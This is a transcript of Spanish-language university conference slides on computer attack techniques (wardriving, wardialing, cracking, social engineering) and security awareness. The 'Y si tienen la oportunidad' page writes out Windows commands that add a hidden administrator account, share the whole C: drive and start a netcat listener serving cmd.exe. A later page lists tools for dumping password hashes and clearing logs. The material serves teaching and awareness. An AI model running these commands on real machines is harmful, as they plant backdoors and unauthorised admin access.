Seguridad Informática

17
TÉCNICAS DE ATAQUE EN SEGURIDAD INFORMÁTICA Grupo de I+D en Tecnologías de la Información (GTI) (Esp) Siler Amador Donado [email protected] http://gseguridad.unicauca.edu.co

description

Conferencia Esp. Siler Amador

Transcript of Seguridad Informática

Page 1: Seguridad Informática

TÉCNICAS DE ATAQUE EN

SEGURIDAD INFORMÁTICA

Grupo de I+D en Tecnologías de la Información (GTI)

(Esp) Siler Amador Donado

[email protected]

http://gseguridad.unicauca.edu.co

Page 2: Seguridad Informática

AGENDA

Hackers vs Crackers

El riesgo en la seguridad informática

Pérdidas económicas por ataques informáticos

Técnicas de ataque

Vectores de ataque a una red

Y si tienen la oportunidad…

Caja de herramientas de ataque

La próxima generación de Troyanos Keylogers

Demo (Ataque Masivo)

… Y en la Unicauca que?

Conclusiones

Page 3: Seguridad Informática

HACKERS VS CRACKERS

Hackers Crackers

Page 4: Seguridad Informática

EL RIESGO EN LA SEGURIDAD

INFORMÁTICA

Page 5: Seguridad Informática

PÉRDIDAS POR ATAQUES

CCS/FBI

Page 6: Seguridad Informática

PÉRDIDAS POR ATAQUES

CCS/FBI

$67.2 billones por año

$7.6 millones por hora

Page 7: Seguridad Informática

TECNICAS DE ATAQUE

Wardriving: Nombre que recibe la búsqueda de redes

inalámbricas para documentar su posición. Para realizar estabúsqueda se necesita como mínimo un equipo móvil (portátil) contarjeta Wireless, y si queremos que la posición sea precisa, un GPSpara pasar los datos a un mapa.

Objetivo: Conectarse al punto de acceso (AP) mal configurado e

ingresar a la la red local de la empresa.

Herramientas: NetStumbler

Kismet

http://www.wardrive.net/wardriving/tools

Page 8: Seguridad Informática

TECNICAS DE ATAQUE

Wardialing: Fue una técnica de los 80´s y 90´s, consitía en

marcar repetidamente a modems y PBX´s disponibles en la red y de

esta forma irrumpir a sistemas remotos.

Objetivo: Conectarse a modems o PBX´s mal configurados e

ingresar a la la red local de la empresa.

Herramientas: THC-Scan 2.0

ModemScan

ShokDial

Page 9: Seguridad Informática

TECNICAS DE ATAQUE

Cracking: Modificar un programa para obtener beneficios.

Normalmente se basa en quitar pantallas introductorias,

protecciones o, como en unas modificaciones de cierto programa de

comunicaciones, conseguir nuevos passwords de acceso a

sistemas.

Objetivo:Tener acceso al software o a la red interna.

Herramientas: Las 100 mejores http://sectools.org/

Inyección SQL

XSS

Page 10: Seguridad Informática

TECNICAS DE ATAQUE

Ing. Social: Persuadir a otra persona (a través de diversasformas) para que nos de un dato útil para cumplir un objetivo. Estedato puede ser un password, un código, etc. incluso pueden darnombres de familiares y fechas importantes, que siempre se usanpara formar claves.

Objetivo: Obtener información sensible que nos permita elacceso a la red.

Herramientas: Teléfono

Mucha psicología

Inteligencia emocional http://www.laflecha.net/perfiles/tecnologia/kevin_mitnick/

Page 11: Seguridad Informática

VECTORES DE ATAQUE A UNA RED

Puntos de acceso

INT

ER

NE

T MO

DE

MWIRELESS

FISICO

RED

Wardriving

Ing. Social

Ward

ialin

gCra

ckin

g

Page 12: Seguridad Informática

Y si tienen la oportunidad…

Menos de 1 minuto es suficiente para:

1. Crear una cuenta con privilegios de Admin!!!1. Abrir la consola de comandos

2. C:\net user fusm2010 fusm2010 /add

3. C:\net localgroup administradores fusm2010 /add

2. Compartir toda la unidad del disco!!!1. C:\net share fusm2010=c:\ /remark:”Demo fusm2010”

3. Colocar un programa en escucha!!!1. http://gseguridad.unicauca.edu.co/nc.exe

2. C:\WINNT\System32\nc.exe -d -L -p 55555 -e cmd.exe

Page 13: Seguridad Informática

Caja de Herramientas de ataque en

línea de comandos

fport.exe - shows open ports and the process that owns the portiplist.exe - enumerates the ip's of the computermd5.exe - gets the md5 hash of a filepw2kget.exe - for win2k gets the password of the currently logged on userpwreveal.exe - gets the passwords of any window that has a ****** editboxregshell.exe - a commandline registry explorer/editorsendmail.exe - a commandline email senderuptime.exe - gets the machines current uptimexwhois - advanced whois lookupScreencap.exe - makes a screenshot of the screen and saves it to screenshot.bmpCMDget.exe - Downloads a file from a website from user provided parameterswebscr.exe - creates a snapshot from the webcam and saves it shutd.exe - program that forces shutdown/reboot of machinebnc.exe - bnc for windows (see bnc.cfg)clslog.exe - clears app/security/system logs XP/NT/2k enum.exe - enumerates IPC$ share to collect informationwinfo.exe - enumerates IPC$ share to collect informationFTPd.exe - small ftp server for dos (see slimftpd.conf)Global.exe - process dos command on all disc/subdirsiislog.exe - clears IIS logsInfo.exe - gets system informationispc.exe - spawns shell on hacked IIS (put idq.dll on remote script dir)nc.exe - netcatpv.exe - process manager for dosPwdump.exe - dumps SAM hashesscrnmode.exe - change screen mode from dosunrar.exe - unrar for doswget.exe - wget for windowswizmo.exe - command tool (see w.txt)dwpp.exe - dial up password graberwinrelay.exe - relay tcp/udp connectionsgetad.exe - escalate to admin user in w2kpipeup.exe - escalate to admin user in w2kdnsid - identify remore dns server

Agradecimientos a: Netranger

Tomado de: http://www.governmentsecurity.org/forum/lofiversion/index.php/t2824.html

Page 14: Seguridad Informática

LA PRÓXIMA GENERACION DE

TROYANOS KEYLOGERS…

http://www.hispasec.com/laboratorio/troyano_video.htm

VIDEO

Page 16: Seguridad Informática

... Y en la Unicauca que?

• Electiva de seguridad informática

• Área de interés en seguridad informática del GTI. (Proyectos de tesis de grado)

• Legislación en comercio electrónico (Finalizado)

• OBSES (Firewall Cluster Beowulf) (Finalizado)

• INFORCE (Finalizado)

• Antivirus-inteligente (En desarrollo)

• Estudio de las tendencias predictivas sobre la escogencia de contraseñas basado en redes bayesianas (Finalizado)

• Proyecto SGSI en UNICAUCA (En desarrollo)

• Publicaciones

Preocupación del departamento de sistemas de la FIET sobre la

problemática de la seguridad de la información en Colombia.

Page 17: Seguridad Informática

CONCLUSIONES

Los ataques de seguridad informática a nivel mundial sonaislados? Inversión en guerra informática? ECHELON,ENFOPOL, CARNÍVORO…• USA

• UK

• CHINA

• RUSIA

Los sistemas de seguridad actuales son reactivos y correctivos.• Preventivos

• Inteligentes

Existen demasiadas herramientas de ataque gratis ydisponibles en la red.

Las técnicas de ataque cambian constantemente.

Segun las estadísticas es muy probable que su sistemahaya sido vulnerado y usted aún no lo sepa!!!.